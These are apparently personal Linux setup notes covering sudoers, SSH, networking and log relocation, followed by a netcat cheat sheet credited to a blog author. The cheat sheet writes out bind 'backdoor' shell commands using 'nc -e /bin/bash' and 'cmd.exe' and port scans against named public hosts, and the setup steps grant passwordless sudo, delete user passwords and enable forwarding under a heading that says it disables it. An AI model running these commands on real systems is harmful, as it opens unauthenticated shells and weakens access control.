  • Change sudoer to allow users in sudo group to change role without
    passwords

  • change in /etc/sudoer

1
%sudo   ALL=(ALL:ALL) NOPASSWD: ALL
  • Add password for root user
1
passwd root
  • Remove passwords from users
1
passwd -d ubuntu
  • Disable dsa key in sshd and remove dsa keys

  • comment in /etc/ssh/sshd_config

1
# HostKey /etc/ssh/ssh_host_dsa_key
1
rm /etc/ssh/ssh_host_dsa_key*
  • Disable depreciated setting and disable forwarding

  • add/change in /etc/ssh/sshd_config

1
2
3
4
5
# UsePrivilegeSeparation yes
AllowAgentForwarding yes
AllowTcpForwarding yes
GatewayPorts no
X11Forwarding yes
  • Check sshd configuration
1
/usr/sbin/sshd -t

Network primary - /etc/network/interfaces.d/eth01

  • /etc/network/interfaces.d/eth0
1
2
3
4
5
auto eth0
iface eth0 inet static
address x.x.x.x
netmask 255.255.255.0
gateway x.x.x.x
  • disable dhcpcd client
1
systemctl disable  dhcpcd.service
  • ntp
1
/etc/systemd/timesyncd.conf:NTP=x.x.x.x y.y.y.y

systemctl status systemd-timesyncd.service

  • rng
1
systemctl status rng-tools.service

Monitoring (not done)

install and enable logcheck? logwatch?

  • /etc/motd
1
2
3
### WARNING ###
...
...
  • troubleshooting tools
1
apt install tcpdump lsof

System: Move heavy writes to USB drive (to save sdcard)

  • Use blkid and find UUID for USB drive patition
  • Create single partion ext4 on USB drive
1
2
3
blkid
fdisk /dev/sda
mkfs.ext4 /dev/sda1
  • Add to /etc/fstab: Example:
1
PARTUUID=7e60cada-01 /data      ext4    defaults,noatime,errors=remount-ro  0       2
1
2
3
4
5
6
7
8
9
mkdir /data
mkdir -p /data/var/cache /data/var/spool
mv /var/log /data/var
ln -sf /data/var/log /var/log
mv /var/cache/apt /data/var/cache/
ln -s /data/var/cache/apt /var/cache/
mv /var/spool/postfix /data/var/spool/
ln -s /data/var/spool/postfix /var/spool/
reboot
  • disable journal

  • change to ‘volatile’ and restart

1
2
grep Storage /etc/systemd/journald.conf 
Storage=volatile
1
systemctl restart systemd-journald.service

netcat utilities

port scanning

A basic port scan command for an IP ncat address looks like this:

1
nc -v -n 8.8.8.8 1-1000
1
nc -v google.com 1-1000

chat or web Server

1
nc -l -p 1299

netcat command screenshot of the chat command

Then all you need to do is launch the chat session with a new TCP connection:

1
nc localhost 1299

basic web server

1
printf 'HTTP/1.1 200 OK\n\n%s' "$(cat index.html)" | netcat -l 8999
1
w3m http://localhost:8999

HTTP requests with netcat

1
printf "GET / HTTP/1.0\r\n\r\n" | nc google.com 80

TCP server and TCP client

Run this Netcat command on the server instance to send the file over port 1499:

1
nc -l 1499 > filename.out

run this command on the client to accept, receive, and close the connection:

1
nc server.com 1499 < filename.in

launching reverse (backdoor) shell

1
nc -n -v -l -p 5555 -e /bin/bash

from any other system on the network, you can test how to run commands on
host after successful Netcat connection in bash.

1
nc -nv 127.0.0.1 5555

netcat fundamentals - command flags

1
2
3
4
5
6
nc -4 – use IPv4 only
nc -6 – use IPv6
nc -u – use UDP instead of TCP
nc -k -l – continue listening after disconnection
nc -n – skip DNS lookups
nc -v – provide verbose output

netcat relays on linux

1
2
nc -l -p [port] 0 (less than) backpipe (pipe) nc [client IP] [port] (pipe) tee
backpipe

netcat banners

1
echo "" | nc -zv -wl [host] [port range] – obtain the TCP banners for a range of ports

netcat backdoor shells

1
2
nc -l -p [port] -e /bin/bash – run a shell on Linux
nc -l -p [port] -e cmd.exe – run a shell on Netcat for Windows

Credits

JEFF PETTERS
Jeff has been working on computers since his Dad brought home an IBM PC 8086 with
dual disk drives. Researching and writing about data security is his dream job.

https://www.varonis.com/blog/author/jpetters/